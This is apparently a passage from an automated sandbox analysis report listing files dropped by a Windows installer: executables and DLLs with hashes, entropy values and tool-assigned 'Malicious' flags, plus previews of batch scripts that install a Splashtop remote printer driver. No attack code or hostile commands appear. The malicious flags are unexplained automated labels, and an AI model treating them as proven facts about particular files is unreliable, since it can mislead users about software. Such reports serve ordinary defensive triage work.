                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7653420469834185
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:F+0YcUgZN/zSbTyB9Bs+VC+k5JEdVMNuE:F+oUgZN/zSbTysOC+k5MVs
                                                                                                                                                                                                                                                                                                                                  MD5:1EF7574BC4D8B6034935D99AD884F15B
                                                                                                                                                                                                                                                                                                                                  SHA1:110709AB33F893737F4B0567F9495AC60C37667C
                                                                                                                                                                                                                                                                                                                                  SHA-256:0814AAD232C96A4661081E570CF1D9C5F09A8572CFD8E9B5D3EAD0FA0F5CA271
                                                                                                                                                                                                                                                                                                                                  SHA-512:947C306A3A1EEC7FCE29EAA9B8D4B5E00FD0918FE9D7A25E262D621FB3EE829D5F4829949E766A660E990D1AC14F87E13E5DBD5F7C8252AE9B2DC82E2762FB73
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.547294400796419
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:yg/LSSz/NZS+cI818WJ6TPPeqj6wnzX/bHz3coD:yg/LSSz/NZSBITOg6+D/X
                                                                                                                                                                                                                                                                                                                                  MD5:F512536173E386121B3EBD22AAC41A4E
                                                                                                                                                                                                                                                                                                                                  SHA1:74AE133215345BEAEBB7A95F969F34A40DDA922A
                                                                                                                                                                                                                                                                                                                                  SHA-256:A993872AD05F33CB49543C00DFCA036B32957D2BD09AAA9DAFE33B934B7A3E4A
                                                                                                                                                                                                                                                                                                                                  SHA-512:1EFA432EF2D61A6F7E7FC3606C5C982F1B95EABC4912EA622D533D540DDCA1A340F8A5F4652AF62A9EFC112CA82D4334E74DECF6DDBC88B0BD191060C08A63B9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):77824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.995224286140262
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3zrhT5+KybRpnE8K74kca7NerB8iXpYmRRXvdi82BSOe9oKSJ2SLD0BEZWkA:3+KY04RMmSCYmBiF4O7WT
                                                                                                                                                                                                                                                                                                                                  MD5:B40FE65431B18A52E6452279B88954AF
                                                                                                                                                                                                                                                                                                                                  SHA1:C25DE80F00014E129FF290BF84DDF25A23FDFC30
                                                                                                                                                                                                                                                                                                                                  SHA-256:800E396BE60133B5AB7881872A73936E24CBEBD7A7953CEE1479F077FFCF745E
                                                                                                                                                                                                                                                                                                                                  SHA-512:E58CF187FD71E6F1F5CF7EAC347A2682E77BC9A88A64E79A59E1A480CAC20B46AD8D0F947DD2CB2840A2E0BB6D3C754F8F26FCF2D55B550EEA4F5D7E57A4D91D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.977706172799676
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:MP2K0pa0WfEYp9Y/XQhpgnbP212YCJpDhiF4O7W:MePOYe4bu1epDh8RW
                                                                                                                                                                                                                                                                                                                                  MD5:3904D0698962E09DA946046020CBCB17
                                                                                                                                                                                                                                                                                                                                  SHA1:EDAE098E7E8452CA6C125CF6362DDA3F4D78F0AE
                                                                                                                                                                                                                                                                                                                                  SHA-256:A51E25ACC489948B31B1384E1DC29518D19B421D6BC0CED90587128899275289
                                                                                                                                                                                                                                                                                                                                  SHA-512:C24AB680981D8D6DB042B52B7B5C5E92078DF83650CAD798874FC09CE8C8A25462E1B69340083F4BCAD20D67068668ABCFA8097E549CFA5AD4F1EE6A235D6EEA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):207184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.508603224700573
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:SJzsVxRROApObap+CPSxzqNJ3pvfsFMV2+/SRVDB:SEOb5x2NxqFMi
                                                                                                                                                                                                                                                                                                                                  MD5:BDF578CA45021464EB4C5F2725FADE13
                                                                                                                                                                                                                                                                                                                                  SHA1:17FD8DD28EBE232EDB4A7D5B4A9734D6F48212F3
                                                                                                                                                                                                                                                                                                                                  SHA-256:F9711EC83463C8D7D8D3C2E0493BBDD9C55D55869AD49E327CC1F0612A836B51
                                                                                                                                                                                                                                                                                                                                  SHA-512:611999852027F5E52A786F4C22A77AF75EE3ECB1584AC1F061100248D19AA1C45C31665A38A46604B1D489A049D3CE00EF43DA7A5E427A3A7C1A5EFA0D874526
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):214992
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.578816818366091
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:1yYZVBVmekQ5ncHc43wAmaxEJg3tNqYU51pQ8DfqXF7q9B24CvJ6BAQ:1y8Vf1uTHNqYUH+8GeMvJ4t
                                                                                                                                                                                                                                                                                                                                  MD5:DDBCBCED9CCBA27D296B680D04178B1D
                                                                                                                                                                                                                                                                                                                                  SHA1:5BE1EF49678E4F9250B675DFE595DF1219DD7EF9
                                                                                                                                                                                                                                                                                                                                  SHA-256:B23B42E24EAB4E2F1DD94711EEC741F94D39F5EBAF238820A0B9D464522C24D2
                                                                                                                                                                                                                                                                                                                                  SHA-512:B913058A50A4235925F208E9FA8740DDA1A070168285401FD9C9032C0CC782887F5D92A0D68796D7473E61EE8DDC1E863503C288CAD1F99C233A0DEDE37CB314
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):147280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.480280521349599
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:Sooboos//G/jWDiNza6LR07qZ2bzl409+E/PXwCSp6WKsAqHew+1l7niE:SooyFiJRmbzl4mZYYqHz+1l7iE
                                                                                                                                                                                                                                                                                                                                  MD5:4359D841792BD3A711065BD347503ED4
                                                                                                                                                                                                                                                                                                                                  SHA1:ED3DA69B4DAAEE1E3C6A35B9B22A3608C210B845
                                                                                                                                                                                                                                                                                                                                  SHA-256:D8BAC61DF2126D9203B3823AA40AF05FE7B6F9C5122DEBAB5F8CEADD1119773B
                                                                                                                                                                                                                                                                                                                                  SHA-512:F1FB6B25199CDBD0C40CCCEB069CF3DC32DEEDC2F21C67CC8C22A189115389795B435631EEA30A94EDE19331FACF475A4BD7163522D9AD0EC1DF6118D1E05EAB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):160080
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.481630469427064
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:CizpEi8PNuoyZLy39r4BRyFr8Tjqe1LP+0hORlE:CUpX8FYFyB8T2oyRa
                                                                                                                                                                                                                                                                                                                                  MD5:1E478E7F7D20800B958E2D1780C805F6
                                                                                                                                                                                                                                                                                                                                  SHA1:F166DB5211F695BA039DC81C246653EC1B25DC02
                                                                                                                                                                                                                                                                                                                                  SHA-256:9989C6791433F8B7FD05F4750F79F9082DBD28087948A366EA695EAC983150CD
                                                                                                                                                                                                                                                                                                                                  SHA-512:852EFB6AE48B3C4BAD4B8E11DC46AAA4CA37A501AFD568B469BB9ED43A27086916588F370286DD1F51834037777C4D2518310A37A469AE7BE19CFE36F08A98D3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):194896
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.4942111692959354
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:0w8OfdMjstdIxIImJZDpwmw6jse70oSzhiVjkXIS1qPfb3PPqFSqQovoRe9C86/9:0w8wZDxspqPfbuSqQCoSz6/e1+1FiAx3
                                                                                                                                                                                                                                                                                                                                  MD5:F0FCF6CB5986E267A978A0DF86471563
                                                                                                                                                                                                                                                                                                                                  SHA1:214F4BB84F7A1981D30B7C4BC13C7B3E4A5CC8B3
                                                                                                                                                                                                                                                                                                                                  SHA-256:34E4A968A87692DA8A2EF073ADD7E19F32009709B50F7C747D1D8BF261C21CBC
                                                                                                                                                                                                                                                                                                                                  SHA-512:529DFD1E587BE6EA67B464C44CC7A0C1B0F6A9CD663590E7BD0083CC7A68DD8F60FC1E81E26012D71CF5C8BD5EFF4B2FB477D5DBEF3FFA1FF4136CE266B5DA6F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):245584
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.433639873152362
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:0w+rqKMvEZF6VPvVpb1eTjLp8D3qkTmII9b9zC+l+smDP00IPWx2Wuw:0drWgFEPNB+MPTHIWjP00Ie3
                                                                                                                                                                                                                                                                                                                                  MD5:FE4F22128776F52062DD8FA74D0B5075
                                                                                                                                                                                                                                                                                                                                  SHA1:3A15B1AD0B5D62D474319A3DB95D985B49537BF1
                                                                                                                                                                                                                                                                                                                                  SHA-256:EC4D01234426AAC9FF2751B209B0484769BEE97A0DC930B1B56A1743CD24B805
                                                                                                                                                                                                                                                                                                                                  SHA-512:163A78CB59061B4B9BE98DC763109744BBBEEDAF8B3CB7EB19A22334AC1F9223880C0E8684FEB4B363C824D9918E72E1B94D5F76AD63235F8C49ADEFC3713637
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):238928
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.071067596161183
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:OG9NqQQHPItXExQNj+mB92u+CW5D37LnuHc45X0T5/uyFNJpfUarTtBB:99AP2b+mBQVJLnYlETtug5T
                                                                                                                                                                                                                                                                                                                                  MD5:2A397EFDA6D84A15B890D56D4292BA6E
                                                                                                                                                                                                                                                                                                                                  SHA1:F985E4893119E6C30191DE84DA25059B33F902A8
                                                                                                                                                                                                                                                                                                                                  SHA-256:398AEC7557E2E1DB30EFCA6FDA0D7D23940B863B396C1A4FC2BB588294F595E6
                                                                                                                                                                                                                                                                                                                                  SHA-512:A199C2FF26C3A3E1DA54D8386F568FA900B853FE3D3754100904EF3153CD72D672971FF72141D9AE5F5BC467D59E2DDC69856C761BBA9DA4488FC69F52A9E5E0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):249168
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.2058943183487445
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:E/vPLr8AhQh4jhNgZzSNPSVlX4T1FrKT7EjUOkdny+ywlJZcWzV8TMXU7o91y4Rd:i3LIl4XgsSVloTnPYdn7lJZRZ8QXqsJ/
                                                                                                                                                                                                                                                                                                                                  MD5:EB8DA0234C4D7C7A58B8FB820AFB4BD2
                                                                                                                                                                                                                                                                                                                                  SHA1:1DED1192371D0B0BF17F5AC908A96A1499C1CABD
                                                                                                                                                                                                                                                                                                                                  SHA-256:88F7BDCB33CDC34B5E8834634A36E2B6A45015016C47EFE4B846A4D202326093
                                                                                                                                                                                                                                                                                                                                  SHA-512:789725D38C041CDC311065E7987CC7E79F9A6C00E2F3ABD37096A04F81258636AB0DA6B99F895CC80DA9F770DB0C594EB8467CCA1B77854E091F8FA18F19200D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):237008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.30179636306813
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:B+2HsTNg3ex5PUwoEK2dvK7PnGxOkf9V3QhjTvI9Nle9owmPDXpUIJonb:BDHsT2qvoEKMAGxOkVJQhjTAEgY
                                                                                                                                                                                                                                                                                                                                  MD5:7DD3CA728E061F9C438209935DF41FD8
                                                                                                                                                                                                                                                                                                                                  SHA1:D291C17619FB2E9B8A4CF07B53A56DC60CFB4C8E
                                                                                                                                                                                                                                                                                                                                  SHA-256:F19F300E4623E3B57F870D8E4B150F2E70D29E6CB47750671D53667BB0804202
                                                                                                                                                                                                                                                                                                                                  SHA-512:E7D0AB0EB37F6B245B1EBDE46C2D9184AB801EB659E4F4ED7C2AFD07843A1646612290AD3C315EE9BF7FC1A9425B58E2A03810014DDBB621EB46B331AA2E753E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):168784
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.240155377344884
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:l0fRIF+SwIL9Bagg2mCEPToX/ITpu0uOpDSgb2WXa+qM5F:CfaCIJbglCe1Vu0uIDSlOF
                                                                                                                                                                                                                                                                                                                                  MD5:77C729F857CFA38CFE4FCB18EE8F6BAD
                                                                                                                                                                                                                                                                                                                                  SHA1:938F96F880E824D03F1174C3D1CD56922452E5CC
                                                                                                                                                                                                                                                                                                                                  SHA-256:C1C016F2917B395A16936C692C35B8E6CC4C0196C26BC69AA8A686747BA690AD
                                                                                                                                                                                                                                                                                                                                  SHA-512:F921A945EFAD2DF95BAB6574029D6E4502A1C2D52E44550547CE2C812E8D06E8120F9EAB07F728E97F17C4949CC112F20E59938906E0F26988E4F79903BCF658
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):187216
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.244838939180771
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:sSUAV0AVZrAVOVrHYapV5Ddr1oxkg9gh0CBEACcodM5nY+WVFGoK4:jvPb6OVrVNJ1ufqBEACjGK
                                                                                                                                                                                                                                                                                                                                  MD5:8E2C3434811B348F7AB9F7DEC6E95C3B
                                                                                                                                                                                                                                                                                                                                  SHA1:349682719857DB46E4A7EBFCEF0F85264B3116F3
                                                                                                                                                                                                                                                                                                                                  SHA-256:11F45D049C8FABF308944D77D17AB3FBB0A7BB5BFA143263B9EFBECA3A568EE3
                                                                                                                                                                                                                                                                                                                                  SHA-512:C271F2BBED3E740D771AF1A3BF684F4CB67C8F9B0D20E7D886817602F76BE8A432B05AB4E2AC8FDFCEEAA194602C81D8C9FFE6E015D224C6DC9C40F125365F5D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):244560
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.236867435454928
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:RuctDSdRbMOiymM/Cufn5B+1jowgreeTwcL:RqXMOFmA5VwgBE0
                                                                                                                                                                                                                                                                                                                                  MD5:61BD6282DB08405FD08C64BC00CEBF4B
                                                                                                                                                                                                                                                                                                                                  SHA1:EC4391249AE7247162C0D28B50ED73B1DCD11246
                                                                                                                                                                                                                                                                                                                                  SHA-256:A3BF8ED5ACCB8EBCA5C9A4430FA54A492E39160AE2BA51285D241D75F1743848
                                                                                                                                                                                                                                                                                                                                  SHA-512:DFEF9209C57E890F7D29280F6A296C5A9D1C3F496464C9EEA28DB0E1C407F2C5042DF926D442480359A120A93D8C44536C5A0C119C3AB6E7D15685F157E28DD6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):333136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.120290709944056
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):273232
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8361644522698635
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):867
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.162389785193304
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\PrnPort.exe /a >> inst.log..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /if /b "Splashtop Remote Printer" /f stprinter.inf /r "StPrinter" /m "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. reg add "HKLM\SOFTWARE\Splashtop Inc.\Splashtop Remote Server" /f /v "PrinterINFa" /t REG_SZ /d "%WINDIR%\System32\DriverStore\FileRepository\%%a\stprinter.inf" >> inst.log.. IF NOT EXIST "%ProgramData%\Splashtop" mkdir "%ProgramData%\Splashtop".. IF NOT EXIST "%ProgramData%\Splashtop\Temp" mkdir "%ProgramData%\Splashtop\Temp".. ECHO Found "%WINDIR%\System32\DriverStore\FileRepository\%%a\stprinter.inf" >> inst.log..)..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.190136582088596
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\PrnPort.exe /a >> inst.log..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /if /b "Splashtop Remote Printer" /f stprinter.inf /r "StPrinter" /m "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. reg add "HKLM\SOFTWARE\Wow6432Node\Splashtop Inc.\Splashtop Remote Server" /f /v "PrinterINFa" /t REG_SZ /d "%WINDIR%\System32\DriverStore\FileRepository\%%a\stprinter.inf" >> inst.log.. IF NOT EXIST "%ProgramData%\Splashtop" mkdir "%ProgramData%\Splashtop".. IF NOT EXIST "%ProgramData%\Splashtop\Temp" mkdir "%ProgramData%\Splashtop\Temp".. ECHO Found "%WINDIR%\System32\DriverStore\FileRepository\%%a\stprinter.inf" >> inst.log..)..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):214
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.631936044721133
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:cd %~dp0..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /q /if /b "Splashtop Remote Printer" /f stprinter.inf /r "StPrinter" /m "Splashtop Remote Printer"
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):203
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.068283784998216
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:@echo off....IF [%1] == [] GOTO RunDefault....rundll32 printui.dll,PrintUIEntry /q /dl /n %1..GOTO :EOF....:RunDefault...rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"...GOTO :EOF
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17908
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.33935778048778
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:fNDJbjaXGStblM2wk0mev6/9IDRfupdYpJIBbIgx+4lMrp2/CsECw8nYe+PjPVhc:n3dw75xa1Sw8nYPLVhtOUez
                                                                                                                                                                                                                                                                                                                                  MD5:2DAC6568B843EBDC5C98598CA32918BE
                                                                                                                                                                                                                                                                                                                                  SHA1:E7740E4BE7F71A82ADBB6E5224D33534E237614C
                                                                                                                                                                                                                                                                                                                                  SHA-256:EB61A0E06BF8C69597F9BB1909E3EB4F926E49800C3F9721FDA3007993DA5EE7
                                                                                                                                                                                                                                                                                                                                  SHA-512:1BC8AA82E68911F5EE1835D19CF49A736C1C35C2F6B4FCD48C3C6FCF7FF6958400D1E815C5E891E172AF9035232175BB00E8A21F5A0590F02DC683F45A6C3D8B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2793
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.507689832444162
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:JQUio6uDhMM/s4244P8/CW2T8/C0kApvgJCrC1sJCr+6pqEsXncT9tuhcOYEZ53t:JQUiRKhMostT9Ap4sr4ssraXx
                                                                                                                                                                                                                                                                                                                                  MD5:313535621266212971E303AF0AF4FE21
                                                                                                                                                                                                                                                                                                                                  SHA1:D81F9D3F7B638DE5EFCA0ECB0162A76485E2C2BF
                                                                                                                                                                                                                                                                                                                                  SHA-256:0B60A283CB98034CEE13118BF1F885A644479CC6F4B19D9E4D24A5FEC6064A1F
                                                                                                                                                                                                                                                                                                                                  SHA-512:8A1A716A2CAD85410F009EE0CDF570F4CA36E3A182927CA5B836F3FC0BEE466F0C4E8B583694A6A4014CE60C45A2439119BF0C1ADDA0ED168053E9F08A6DF608
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
